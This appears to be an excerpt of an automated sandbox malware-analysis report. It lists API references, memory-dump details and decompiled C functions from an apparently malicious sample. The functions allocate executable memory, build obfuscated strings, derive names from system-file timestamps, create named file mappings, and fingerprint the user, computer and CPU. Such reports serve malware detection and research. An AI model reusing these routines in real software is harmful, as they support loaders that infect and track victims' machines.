GetClipboardData.USER32 ref: 10018B3B
GetClipboardData.USER32 ref: 10018B45
GetClipboardData.USER32 ref: 10018B4F
GetClipboardData.USER32 ref: 10018B59
GetClipboardData.USER32 ref: 10018B63
GetClipboardData.USER32 ref: 10018B6D
GetClipboardData.USER32 ref: 10018B77
GetClipboardData.USER32 ref: 10018B81
GetClipboardData.USER32 ref: 10018B8B
GetClipboardData.USER32 ref: 10018B95
GetClipboardData.USER32 ref: 10018B9F
GetClipboardData.USER32 ref: 10018BA9
GetClipboardData.USER32 ref: 10018BB3
GetClipboardData.USER32 ref: 10018BBD
GetClipboardData.USER32 ref: 10018BC7
GetClipboardData.USER32 ref: 10018BD1
GetClipboardData.USER32 ref: 10018BDB
GetClipboardData.USER32 ref: 10018BE5
GetClipboardData.USER32 ref: 10018BEF
GetClipboardData.USER32 ref: 10018BF9
GetClipboardData.USER32 ref: 10018C03
GetClipboardData.USER32 ref: 10018C0D
GetClipboardData.USER32 ref: 10018C17
GetClipboardData.USER32 ref: 10018C21
GetClipboardData.USER32 ref: 10018C2B
GetClipboardData.USER32 ref: 10018C35
GetClipboardData.USER32 ref: 10018C3F
GetClipboardData.USER32 ref: 10018C49
GetClipboardData.USER32 ref: 10018C53
GetClipboardData.USER32 ref: 10018C5D
GetClipboardData.USER32 ref: 10018C67
GetClipboardData.USER32 ref: 10018C71
GetClipboardData.USER32 ref: 10018C7B
GetClipboardData.USER32 ref: 10018C85
GetClipboardData.USER32 ref: 10018C8F
GetClipboardData.USER32 ref: 10018C99
GetClipboardData.USER32 ref: 10018CA3
GetClipboardData.USER32 ref: 10018CAD
GetClipboardData.USER32 ref: 10018CB7
GetClipboardData.USER32 ref: 10018CC1
GetClipboardData.USER32 ref: 10018CCB
GetClipboardData.USER32 ref: 10018CD5
GetClipboardData.USER32 ref: 10018CDF
GetClipboardData.USER32 ref: 10018CE9
GetClipboardData.USER32 ref: 10018CF3
GetClipboardData.USER32 ref: 10018CFD
GetClipboardData.USER32 ref: 10018D07
GetClipboardData.USER32 ref: 10018D11
GetClipboardData.USER32 ref: 10018D1B
GetClipboardData.USER32 ref: 10018D25
GetClipboardData.USER32 ref: 10018D2F
GetClipboardData.USER32 ref: 10018D39
GetClipboardData.USER32 ref: 10018D43
GetClipboardData.USER32 ref: 10018D4D
GetClipboardData.USER32 ref: 10018D57
GetClipboardData.USER32 ref: 10018D61
GetClipboardData.USER32 ref: 10018D6B
GetClipboardData.USER32 ref: 10018D75
GetClipboardData.USER32 ref: 10018D7F
GetClipboardData.USER32 ref: 10018D89
GetClipboardData.USER32 ref: 10018D93
GetClipboardData.USER32 ref: 10018D9D
GetClipboardData.USER32 ref: 10018DA7
GetClipboardData.USER32 ref: 10018DB1
GetClipboardData.USER32 ref: 10018DBB
GetClipboardData.USER32 ref: 10018DC5
GetClipboardData.USER32 ref: 10018DCF
GetClipboardData.USER32 ref: 10018DD9
GetClipboardData.USER32 ref: 10018DE3
GetClipboardData.USER32 ref: 10018DED
GetClipboardData.USER32 ref: 10018DF7
GetClipboardData.USER32 ref: 10018E01
GetClipboardData.USER32 ref: 10018E0B
GetClipboardData.USER32 ref: 10018E15
GetClipboardData.USER32 ref: 10018E1F
GetClipboardData.USER32 ref: 10018E29
GetClipboardData.USER32 ref: 10018E33
GetClipboardData.USER32 ref: 10018E3D
GetClipboardData.USER32 ref: 10018E47
GetClipboardData.USER32 ref: 10018E51
GetClipboardData.USER32 ref: 10018E5B
GetClipboardData.USER32 ref: 10018E65
GetClipboardData.USER32 ref: 10018E6F
GetClipboardData.USER32 ref: 10018E79
GetClipboardData.USER32 ref: 10018E83
GetClipboardData.USER32 ref: 10018E8D
GetClipboardData.USER32 ref: 10018E97
GetClipboardData.USER32 ref: 10018EA1
GetClipboardData.USER32 ref: 10018EAB
GetClipboardData.USER32 ref: 10018EB5
GetClipboardData.USER32 ref: 10018EBF
GetClipboardData.USER32 ref: 10018EC9
GetClipboardData.USER32 ref: 10018ED3
GetClipboardData.USER32 ref: 10018EDD
GetClipboardData.USER32 ref: 10018EE7
GetClipboardData.USER32 ref: 10018EF1
GetClipboardData.USER32 ref: 10018EFB
GetClipboardData.USER32 ref: 10018F05
GetClipboardData.USER32 ref: 10018F0F
GetClipboardData.USER32 ref: 10018F19
GetClipboardData.USER32 ref: 10018F23
GetClipboardData.USER32 ref: 10018F2D
GetClipboardData.USER32 ref: 10018F37
GetClipboardData.USER32 ref: 10018F41
GetClipboardData.USER32 ref: 10018F4B
GetClipboardData.USER32 ref: 10018F55
GetClipboardData.USER32 ref: 10018F5F
GetClipboardData.USER32 ref: 10018F69
GetClipboardData.USER32 ref: 10018F73
GetClipboardData.USER32 ref: 10018F7D
GetClipboardData.USER32 ref: 10018F87
GetClipboardData.USER32 ref: 10018F91
GetClipboardData.USER32 ref: 10018F9B
GetClipboardData.USER32 ref: 10018FA5
GetClipboardData.USER32 ref: 10018FAF
GetClipboardData.USER32 ref: 10018FB9
GetClipboardData.USER32 ref: 10018FC3
GetClipboardData.USER32 ref: 10018FCD
GetClipboardData.USER32 ref: 10018FD7
GetClipboardData.USER32 ref: 10018FE1
GetClipboardData.USER32 ref: 10018FEB
GetClipboardData.USER32 ref: 10018FF5
GetClipboardData.USER32 ref: 10018FFF

Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013512
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001351D
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013528
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013533
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001353E
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013549
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013554
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001355F
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001356A
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013575
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013580
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001358B
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013596
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100135A1
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100135AC
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100135B7
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100135C2
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100135CD
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100135D8
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100135E3
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100135EE
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100135F9
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013604
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001360F
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001361A
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013625
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013630
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001363B
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013646
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013651
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001365C
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013667
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013672
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001367D
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013688
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013693
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001369E
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100136A9
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100136B4
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100136BF
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100136CA
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100136D5
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100136E0
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100136EB
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 100136F6
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013701
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 1001370C
Part of subcall function 10013500: CharNextA.USER32(rlGoyLNdfO), ref: 10013717

Strings

rlGoyLNdfO, xrefs: 10018292
FYXNKJBBJP, xrefs: 1001827D

Memory Dump Source

Source File: 00000000.00000002.460026556.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.460008405.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.460052961.0000000010033000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.460064901.000000001003A000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$Data$Char$Next$CursorDestroy$AbortBatchCloseCreateFigureFileIconLimitMetaModeOpenOwnerPathThreadUpper
String ID: FYXNKJBBJP$rlGoyLNdfO
API String ID: 96220501-2716119831
Opcode ID: 6482c18a11bbbcbe96008be13e2aa84dd8b64324aa2bd17832730c5995c2fff0
Instruction ID: f3a61897b374ae398b91a8df1d513631f3a1706dbed9691a6c6fcbd18589e8cb
Opcode Fuzzy Hash: 6482c18a11bbbcbe96008be13e2aa84dd8b64324aa2bd17832730c5995c2fff0
Instruction Fuzzy Hash: 4FB224BDD012159FEB05DBE0E9CCA6F7779BB49305F22450AF502AF262CE35A910CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0122B780, Relevance: 65.0, APIs: 3, Strings: 34, Instructions: 297memorynativeCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0122B7D1
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0122B8D3
NtSetInformationProcess.NTDLL(000000FF,00000022,00000002,00000004), ref: 0122BB1D

Strings

e, xrefs: 0122BA8D
o, xrefs: 0122BA69
ntdll.dll, xrefs: 0122BAE5, 0122BAE8
p, xrefs: 0122BAB5
s, xrefs: 0122BADD
o, xrefs: 0122BA9D
h, xrefs: 0122BA61
A, xrefs: 0122BABD
P, xrefs: 0122BA95
e, xrefs: 0122BAA5
l, xrefs: 0122BA81
s, xrefs: 0122BAAD
i, xrefs: 0122BAB9
D, xrefs: 0122BAB1
d, xrefs: 0122BA79
r, xrefs: 0122BA99
l, xrefs: 0122BA7D
NtSetInformationProcess, xrefs: 0122BAF7, 0122BAFA
a, xrefs: 0122BAC5
., xrefs: 0122BA75
e, xrefs: 0122BA71
r, xrefs: 0122BA6D
r, xrefs: 0122BAC9
t, xrefs: 0122BA91
s, xrefs: 0122BAA9
e, xrefs: 0122BAD5
s, xrefs: 0122BAD9
S, xrefs: 0122BA89
n, xrefs: 0122BAD1
c, xrefs: 0122BAA1
e, xrefs: 0122BACD
s, xrefs: 0122BA5D
w, xrefs: 0122BAC1
c, xrefs: 0122BA65

Memory Dump Source

Source File: 00000000.00000002.456939571.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: AllocVirtual$InformationProcess
String ID: .$A$D$NtSetInformationProcess$P$S$a$c$c$d$e$e$e$e$e$h$i$l$l$n$ntdll.dll$o$o$p$r$r$r$s$s$s$s$s$t$w
API String ID: 909339949-3052210031
Opcode ID: 97769fb1da223d042207744e2717f0fc49578be2e3c1aaca9d71a9948057ec57
Instruction ID: 8ff6d630ce52bc64a1e309b96fcaa55bb9b5b10bc340ccba6b4d0d376e7687df
Opcode Fuzzy Hash: 97769fb1da223d042207744e2717f0fc49578be2e3c1aaca9d71a9948057ec57
Instruction Fuzzy Hash: 68E12174D04289DFDB05CF98C444BEEBFB2AF59304F148198E5486F382C3BAA955CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F632BA, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E02F632BA(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x2f6d2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x2f6d238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x2f6d2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x2f6d238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x2f6d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x2f6d2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x2f6d2a4; // 0xb3a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x2f6e7e8; // 0x73797325
				_t83 = E02F677E6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x2f6d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9");
					CloseHandle(_v32);
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x2f6d2a4; // 0xb3a5a8
				_t16 = _t93 + 0x2f6e809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x02f632c3
0x02f632c9
0x02f632cb
0x02f632e5
0x02f632e7
0x02f632ec
0x02f63561
0x02f63568
0x02f63568
0x02f632f2
0x02f63307
0x02f63309
0x02f6330b
0x02f63310
0x02f63551
0x02f6355b
0x00000000
0x02f6355b
0x02f63316
0x02f63321
0x02f63326
0x02f6332b
0x02f6332e
0x02f63335
0x02f6333a
0x02f6333f
0x02f63541
0x02f6354b
0x00000000
0x02f6354b
0x02f63355
0x02f63359
0x02f6335c
0x02f6335f
0x02f63365
0x02f6336a
0x02f63373
0x02f63379
0x02f63383
0x02f6338a
0x02f6338a
0x02f6339c
0x02f633a7
0x02f633b5
0x02f633ba
0x02f633bf
0x02f633c2
0x02f633c7
0x02f633d1
0x02f633d4
0x02f633d7
0x02f633ed
0x02f633ef
0x02f633f4
0x02f6353f
0x00000000
0x02f6353f
0x02f6340b
0x02f6345c
0x02f6341f
0x02f63427
0x02f6342c
0x02f6343a
0x02f63443
0x02f6344c
0x02f6344c
0x02f6345a
0x02f6345a
0x02f63460
0x02f63464
0x02f63464
0x02f6346a
0x00000000
0x00000000
0x02f6346c
0x02f63472
0x02f63519
0x02f6351c
0x02f63529
0x02f63529
0x02f6352d
0x00000000
0x00000000
0x02f63522
0x02f63526
0x02f63526
0x02f63528
0x02f63528
0x02f63532
0x02f63539
0x02f6353b
0x00000000
0x02f6353b
0x02f63478
0x02f6347a
0x02f6347a
0x02f6348d
0x02f63493
0x02f6349e
0x02f634a0
0x02f634a4
0x02f634a6
0x02f634a6
0x02f634ab
0x02f634ad
0x02f634ad
0x02f634ab
0x02f634b2
0x02f634b6
0x02f634b6
0x02f634c6
0x02f634cb
0x02f634ce
0x02f634ce
0x02f634d1
0x02f634db
0x02f634e3
0x02f634e8
0x02f634f6
0x02f634f6
0x02f6350a
0x02f6350e
0x02f6350e

APIs

RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 02F632E5
RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 02F63307
memset.NTDLL ref: 02F63321

Part of subcall function 02F677E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,02F6333A,73797325), ref: 02F677F7
Part of subcall function 02F677E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02F67811

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02F6335F
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02F63373
CloseHandle.KERNEL32(00000000), ref: 02F6338A
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02F63396
lstrcat.KERNEL32(?,642E2A5C), ref: 02F633D7
FindFirstFileA.KERNELBASE(?,?), ref: 02F633ED
CompareFileTime.KERNEL32(?,?), ref: 02F6340B
FindNextFileA.KERNELBASE(02F6207E,?), ref: 02F6341F
FindClose.KERNEL32(02F6207E), ref: 02F6342C
FindFirstFileA.KERNEL32(?,?), ref: 02F63438
CompareFileTime.KERNEL32(?,?), ref: 02F6345A
StrChrA.SHLWAPI(?,0000002E), ref: 02F6348D
memcpy.NTDLL(00000000,?,00000000), ref: 02F634C6
FindNextFileA.KERNELBASE(02F6207E,?), ref: 02F634DB
FindClose.KERNEL32(02F6207E), ref: 02F634E8
FindFirstFileA.KERNEL32(?,?), ref: 02F634F4
CompareFileTime.KERNEL32(?,?), ref: 02F63504
FindClose.KERNELBASE(02F6207E), ref: 02F63539
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 02F6354B
HeapFree.KERNEL32(00000000,?), ref: 02F6355B

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID:
API String ID: 455834338-0
Opcode ID: ed5c3bfbb84ee9c72007b471ae2c16cb4033dae7800db47a51e7fac045dcce48
Instruction ID: f4eeff4266b02770f3b6245d38b142418a55e2793f74a542be8613d350a5e210
Opcode Fuzzy Hash: ed5c3bfbb84ee9c72007b471ae2c16cb4033dae7800db47a51e7fac045dcce48
Instruction Fuzzy Hash: 4D815B72D00119AFDB119FA5CC8CAEEFBB9EF48B80F1404AAE655E7250D7309A54CF60

Uniqueness

Uniqueness Score: -1.00%

Function 015110FC, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E015110FC(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L01512180();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x1514144;
				_push(_t15 + 0x151505e);
				_push(_t15 + 0x1515054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0151217A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x1514148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x015110fc
0x01511105
0x01511109
0x0151110f
0x01511114
0x01511119
0x0151111c
0x0151111f
0x01511124
0x01511125
0x01511128
0x01511133
0x0151113a
0x0151113e
0x01511140
0x01511141
0x01511144
0x01511149
0x01511153
0x01511155
0x01511155
0x01511169
0x0151116f
0x01511173
0x015111c3
0x01511175
0x0151117e
0x01511194
0x0151119c
0x015111ae
0x015111b2
0x00000000
0x00000000
0x0151119e
0x015111a1
0x015111a6
0x015111a8
0x015111a8
0x01511189
0x0151118b
0x015111b4
0x015111b5
0x015111b5
0x0151117e
0x015111cb

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 01511109
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0151111F
_snwprintf.NTDLL ref: 01511144
CreateFileMappingW.KERNELBASE(000000FF,01514148,00000004,00000000,?,?), ref: 01511169
GetLastError.KERNEL32 ref: 01511180
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 01511194
GetLastError.KERNEL32 ref: 015111AC
CloseHandle.KERNEL32(00000000), ref: 015111B5
GetLastError.KERNEL32 ref: 015111BD

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 67c02f538e54e51ae3730f0d88712d6db4fdb40a335622b3e2cd29a638d39520
Instruction ID: a35b1f7dc123e41935f21d1a15593e19d2e230a8ab18e0c143857bd1bfd942b9
Opcode Fuzzy Hash: 67c02f538e54e51ae3730f0d88712d6db4fdb40a335622b3e2cd29a638d39520
Instruction Fuzzy Hash: C42186B6680108BFE722AFA8DCC4E9D7BE9FB84350F114165F715DF144D77059498B60

Uniqueness

Uniqueness Score: -1.00%

Function 02F693D5, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E02F693D5(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2f6d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02F66F89( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2f6d2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2f6d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02F67CF7(_v8 + _v8, _t64);
							}
							HeapFree( *0x2f6d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2f6d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02F67CF7(_v8 + _v8, _t64);
						}
						HeapFree( *0x2f6d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02f693d5
0x02f693dd
0x02f693e1
0x02f693e4
0x02f693e9
0x02f693eb
0x02f693f0
0x02f693f0
0x02f693f6
0x02f693f8
0x02f69405
0x02f69466
0x02f69407
0x02f6940c
0x02f69412
0x02f69417
0x02f69425
0x02f69429
0x02f69438
0x02f6943f
0x02f69446
0x02f69446
0x02f69451
0x02f69451
0x02f69429
0x02f69417
0x02f69468
0x02f6946e
0x02f69478
0x02f6947a
0x02f6947f
0x02f6948e
0x02f69492
0x02f6949d
0x02f694a4
0x02f694ab
0x02f694ab
0x02f694b7
0x02f694b7
0x02f69492
0x02f694c2
0x02f694c4
0x02f694c7
0x02f694c9
0x02f694cc
0x02f694cf
0x02f694d9
0x02f694dd
0x02f694e1

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02F6940C
RtlAllocateHeap.NTDLL(00000000,?), ref: 02F69423
GetUserNameW.ADVAPI32(00000000,?), ref: 02F69430
HeapFree.KERNEL32(00000000,00000000), ref: 02F69451
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02F69478
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02F6948C
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02F69499
HeapFree.KERNEL32(00000000,00000000), ref: 02F694B7

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 16b2914a871020c0606836408bd7d4a5f16db994ccb0dc643be34deebe6c79c1
